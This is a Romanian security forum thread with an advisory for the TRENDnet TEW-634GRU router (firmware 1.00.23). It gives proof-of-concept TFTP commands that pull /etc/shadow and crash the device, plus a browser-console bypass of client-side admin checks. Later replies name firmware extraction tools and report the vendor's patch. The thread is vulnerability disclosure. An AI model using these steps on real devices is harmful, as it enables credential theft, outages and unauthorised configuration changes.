Jump to content
SirGod

[RST] TRENDnet TEW-634GRU 1.00.23 Multiple Vulnerabilities

Recommended Posts

Avand in vedere situatia din ultimul timp, am decis sa ma uit putin prin internals. Mai exista si alte chestii, dar nu avea rost sa le mentionez. Ce am gasit interesant, si nu am notat, este un fisier:

/www/CVS/Root

care are urmatorul continut:

:pserver:joe_lin@172.21.32.250:/cvsroot/WWW

Inca nu mi-am dat seama ce anume e, o sa investighez mai departe ca pare dubios.

Mai jos aveti "advisory"-ul:

# Title: TRENDnet TEW-634GRU 1.00.23 Multiple Vulnerabilities

# Author: SirGod

# Website: www.rstforums.com

# Vendor Homepage: http://www.trendnet.com/

# Version: 1.00.23

1. Local file disclosure

The router has the TFTP service enabled by default and it can be accessed without any prior authentication (since TFTP does not support authentication). The whole filesystem is exposed to any person that is connected to the network.

Proof of concept:

sirgod@linuxbox:~$ tftp 192.168.10.1
tftp> get
(files) /etc/shadow
Received 357 bytes in 0.3 seconds
tftp> quit
sirgod@linuxbox:~$ cat shadow
root::10933:0:99999:7:::
Admin:[REMOVED]:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::

2. Local router crash

If you upload a file to the router, it will crash. You will have to reset it (physically) and reconfigure it. After the file is uploaded, accessing the router's IP will give you a blank page and then it will crash.

Proof of concept:

sirgod@linuxbox:~$ tftp 192.168.10.1
tftp> put
(file) /home/file.txt /www/file.txt

3. Privilege escalation

The web app incorporates two types of login: user and admin. Few actions (load settings, reset settings) require an admin account to perform them. The validation is done client-side, in JavaScript. See the following code snippet:

settings.asp

--- START CODE SNIPPET --- 


function check_load_settings(){
var login_who="user";
if(login_who== "user"){
window.location.href ="back.asp";
}else{
if(confirm(msg[MSG17])){
if (get_by_id("file").value == ''){
alert(msg[MSG33]);
}else{
send_submit("form1");
}
}
}
}

function check_restore_default(){
var login_who="user";
if(login_who== "user"){
window.location.href ="back.asp";
}else{
if(confirm(msg[MSG34])){
send_submit("form2");
}
}
}


--- END CODE SNIPPET ---

There are two ways to bypass this:

a) The easy way: submit the form from the JavaScript console, directly from your browser, by running:

send_submit("form2"); // To restore factory default settings.
send_submit("form3"); // To restore configuration settings (existent). You must select a file beforehand.

B) The other way: You can save the page locally, change the value of the variable and run it.

  • Upvote 2

Share this post


Link to post
Share on other sites
ai decompilat firmwareul ? daca Da cu ce tooluri ... ca si eu vreau sa im bat capul cu o chestie la un dlink ?

Da. Ini?ial am decompilat firmware-ul. Am folosit binwalk, firmware-mod-kit ?i dd pentru a extrage filesystemul de la offsetul corect. Vezi ca dac? iei kitul de pe Google Code ?i FS e mai nou, cel default nu o sa îl poat? extrage. Asa am p??it ?i eu, dar are sursa pentru alte versiuni. Am compilat una mai noua ?i a mers.

Share this post


Link to post
Share on other sites

Nu ma asteptam, se pare ca au bagat in seama advisory-ul, l-au rezolvat si au lansat un fix.

TRENDnet | Support | TEW-634GRU | N300 Wireless Gigabit Router w/ USB Port



[LIST]
[*]Hardware: V1.0R
Firmware: 1.01B14
Date: 05/2014
Notes:
[LIST]
[*]Addressed security issue with TFTP access
[*]Removed “User” account feature for added security
[/LIST]
[/LIST]

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...